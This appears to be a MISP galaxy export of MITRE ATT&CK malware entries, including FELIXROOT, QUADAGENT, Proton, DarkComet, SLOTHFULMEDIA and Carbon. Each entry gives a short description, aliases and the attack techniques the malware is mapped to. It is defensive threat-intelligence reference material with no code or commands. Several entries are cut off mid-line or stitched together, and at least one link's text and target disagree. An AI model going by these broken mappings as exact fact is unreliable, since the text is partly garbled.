• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Man in the Browser - T1185" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495" with estimative-language:likelihood-probability="almost-certain"

Table 4773. Table References

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<td><a href="https://attack.mitre.org/software/S0266">https://attack.mitre.org/software/S0266</a></td>
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</tr>
</tbody>
</table>

**FELIXROOT - S0267**

[FELIXROOT](https://attack.mitre.org/software/S0267) is a backdoor that has been used to target Ukrainian victims. (Citation: FireEye FELIXROOT July 2018)

The tag is: misp-galaxy:mitre-malware="FELIXROOT - S0267"

FELIXROOT - S0267 is also known as:
• FELIXROOT
• GreyEnergy mini

FELIXROOT - S0267 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
Keydnap - S0276

This piece of malware steals the content of the user's keychain while maintaining a permanent backdoor (Citation: OSX Keydnap malware).

The tag is: `misp-galaxy:mitre-malware="Keydnap - S0276"`

Keydnap - S0276 is also known as:

- Keydnap
- OSX/Keydnap

Keydnap - S0276 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1548.001"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001"` with `estimative-language:likelihood-probability="almost-certain"`
OBAD - S0286

OBAD is an Android malware family. (Citation: TrendMicro-Obad)

The tag is: misp-galaxy:mitre-malware="OBAD - S0286"

OBAD - S0286 is also known as:

- OBAD

OBAD - S0286 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"

Bisonal - S0268

[Bisonal](https://attack.mitre.org/software/S0268) is malware that has been used in attacks against targets in Russia, South Korea, and Japan. It has been observed in the wild since 2014. (Citation: Unit 42 Bisonal July 2018)

The tag is: misp-galaxy:mitre-malware="Bisonal - S0268"

Bisonal - S0268 is also known as:

- Bisonal

Bisonal - S0268 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with
estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0268">https://attack.mitre.org/software/S0268</a></td>
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</table>

**QUADAGENT - S0269**

[QUADAGENT](https://attack.mitre.org/software/S0269) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: Unit 42 QUADAGENT July 2018)

The tag is: *misp-galaxy:mitre-malware="QUADAGENT - S0269"*

QUADAGENT - S0269 is also known as:

- QUADAGENT

QUADAGENT - S0269 has relationships with:
• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 4778. Table References

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<td><a href="https://attack.mitre.org/software/S0269">https://attack.mitre.org/software/S0269</a></td>
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</table>
**FruitFly - S0277**

FruitFly is designed to spy on mac users (Citation: objsee mac malware 2017).

The tag is: `misp-galaxy:mitre-malware="FruitFly - S0277"`

FruitFly - S0277 is also known as:

- FruitFly

FruitFly - S0277 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001"` with estimative-language:likelihood-probability="almost-certain"

*Table 4779. Table References*

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<td><a href="https://attack.mitre.org/software/S0277">https://attack.mitre.org/software/S0277</a></td>
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<td><a href="https://objective-see.com/blog/blog_0x25.html">https://objective-see.com/blog/blog_0x25.html</a></td>
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</table>

**ZergHelper - S0287**

[ZergHelper](https://attack.mitre.org/software/S0287) is iOS riskware that was unique due to its apparent evasion of Apple's App Store review process. No malicious functionality was identified in the app, but it presents security risks. (Citation: Xiao-ZergHelper)

The tag is: `misp-galaxy:mitre-malware="ZergHelper - S0287"`

ZergHelper - S0287 is also known as:

- ZergHelper

ZergHelper - S0287 has relationships with:
• uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 4780. Table References

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<td><a href="https://attack.mitre.org/software/S0287">https://attack.mitre.org/software/S0287</a></td>
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</table>

**iKitten - S0278**

[iKitten](https://attack.mitre.org/software/S0278) is a macOS exfiltration agent (Citation: objsee mac malware 2017).

The tag is: *misp-galaxy:mitre-malware="iKitten - S0278"*

iKitten - S0278 is also known as:

• iKitten
• OSX/MacDownloader

iKitten - S0278 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="RC Scripts - T1037.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keychain - T1555.001" with estimative-language:likelihood-probability="almost-certain"

Table 4781. Table References

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**XcodeGhost - S0297**

[XcodeGhost](https://attack.mitre.org/software/S0297) is iOS malware that infected at least 39 iOS apps in 2015 and potentially affected millions of users. (Citation: PaloAlto-XcodeGhost1) (Citation: PaloAlto-XcodeGhost)

The tag is: *misp-galaxy:mitre-malware="XcodeGhost - S0297"*

XcodeGhost - S0297 is also known as:

- XcodeGhost

XcodeGhost - S0297 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Capture Clipboard Data - T1414"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Input Prompt - T1411"* with estimative-language:likelihood-probability="almost-certain"

Table 4782. Table References

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<td><a href="https://attack.mitre.org/software/S0278">https://attack.mitre.org/software/S0297</a></td>
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</table>

**Proton - S0279**

[Proton](https://attack.mitre.org/software/S0279) is a macOS backdoor focusing on data theft and credential access (Citation: objsee mac malware 2017).

The tag is: *misp-galaxy:mitre-malware="Proton - S0279"*

Proton - S0279 is also known as:

- Proton

Proton - S0279 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"* with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keychain - T1555.001" with estimative-language:likelihood-probability="almost-certain"

Table 4783. Table References

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<td><a href="https://objective-see.com/blog/blog_0x25.html">https://objective-see.com/blog/blog_0x25.html</a></td>
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</table>

**KeyRaider - S0288**

[KeyRaider](https://attack.mitre.org/software/S0288) is malware that steals Apple account credentials and other data from jailbroken iOS devices. It also has ransomware functionality. (Citation: Xiao-KeyRaider)
The tag is: `misp-galaxy:mitre-malware="KeyRaider - S0288"`

KeyRaider - S0288 is also known as:

- KeyRaider

KeyRaider - S0288 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Device Lockout - T1446"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426"` with estimative-language:likelihood-probability="almost-certain"

Table 4784. Table References

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<td><a href="https://attack.mitre.org/software/S0288">https://attack.mitre.org/software/S0288</a></td>
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**NotCompatible - S0299**

[NotCompatible](https://attack.mitre.org/software/S0299) is an Android malware family that was used between at least 2014 and 2016. It has multiple variants that have become more sophisticated over time. (Citation: Lookout-NotCompatible)

The tag is: `misp-galaxy:mitre-malware="NotCompatible - S0299"`

NotCompatible - S0299 is also known as:

- NotCompatible

NotCompatible - S0299 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Exploit Enterprise Resources - T1428"` with estimative-language:likelihood-probability="almost-certain"

Table 4785. Table References

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<td><a href="https://attack.mitre.org/software/S0299">https://attack.mitre.org/software/S0299</a></td>
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<tr>
<td><a href="https://blog.lookout.com/blog/2014/11/19/notcompatible/">https://blog.lookout.com/blog/2014/11/19/notcompatible/</a></td>
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</table>

**UBoatRAT - S0333**

[UBoatRAT](https://attack.mitre.org/software/S0333) is a remote access tool that was identified in
May 2017.(Citation: PaloAlto UBoatRAT Nov 2017)

The tag is: *misp-galaxy:mitre-malware="UBoatRAT - S0333"*

**UBoatRAT - S0333** is also known as:

- **UBoatRAT**

**UBoatRAT - S0333** has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197"* with estimative-language:likelihood probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"* with estimative-language:likelihood probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002"* with estimative-language:likelihood probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"* with estimative-language:likelihood probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003"* with estimative-language:likelihood probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"* with estimative-language:likelihood probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="System Checks - T1497.001"* with estimative-language:likelihood probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0333">https://attack.mitre.org/software/S0333</a></td>
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**DarkComet - S0334**

[DarkComet](https://attack.mitre.org/software/S0334) is a Windows remote administration tool and backdoor.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)

The tag is: *misp-galaxy:mitre-malware="DarkComet - S0334"*
DarkComet - S0334 is also known as:

- DarkComet
- DarkKomet
- Fynloski
- Krademok
- FYNLOS

DarkComet - S0334 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with
estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 4787. Table References

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<td><a href="https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/">https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/</a></td>
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</table>

**Rifdoor - S0433**

[Rifdoor](https://attack.mitre.org/software/S0433) is a remote access trojan (RAT) that shares numerous code similarities with [HotCroissant](https://attack.mitre.org/software/S0431). *(Citation: Carbon Black HotCroissant April 2020)*

The tag is: *misp-galaxy:mitre-malware="Rifdoor - S0433"*

Rifdoor - S0433 is also known as:

- Rifdoor

Rifdoor - S0433 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with
SLOTHFULMEDIA - S0533

[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017.(Citation: CISA MAR SLOTHFULMEDIA October 2020)(Citation: Costin Raiu IAmTheKing October 2020) It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.(Citation: USCYBERCOM SLOTHFULMEDIA October 2020)(Citation: Kaspersky IAmTheKing October 2020)

In October 2020, Kaspersky Labs assessed [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is part of an activity cluster it refers to as "IAmTheKing".(Citation: Kaspersky IAmTheKing October 2020) ESET also noted code similarity between [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) and droppers used by a group it refers to as "PowerPool".(Citation: ESET PowerPool Code October 2020)

The tag is: _misp-galaxy:mitre-malware="SLOTHFULMEDIA - S0533"

SLOTHFULMEDIA - S0533 is also known as:

- SLOTHFULMEDIA
- JackOfHearts
- QueenOfClubs

SLOTHFULMEDIA - S0533 has relationships with:

- uses: _misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
- uses: _misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: _misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
- uses: _misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: _misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: _misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 4789. Table References

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<td><a href="https://attack.mitre.org/software/S0533">https://attack.mitre.org/software/S0533</a></td>
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<tr>
<td><a href="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a">https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a</a></td>
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</table>
Carbon - S0335

[Carbon](https://attack.mitre.org/software/S0335) is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. [Carbon](https://attack.mitre.org/software/S0335) has been selectively used by [Turla](https://attack.mitre.org/groups/G0010) to target government and foreign affairs-related organizations in Central Asia.(Citation: ESET Carbon Mar 2017)(Citation: Securelist Turla Oct 2018)

The tag is: `misp-galaxy:mitre-malware="Carbon - S0335"`

Carbon - S0335 is also known as:

- Carbon

Carbon - S0335 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
Table 4790. Table References

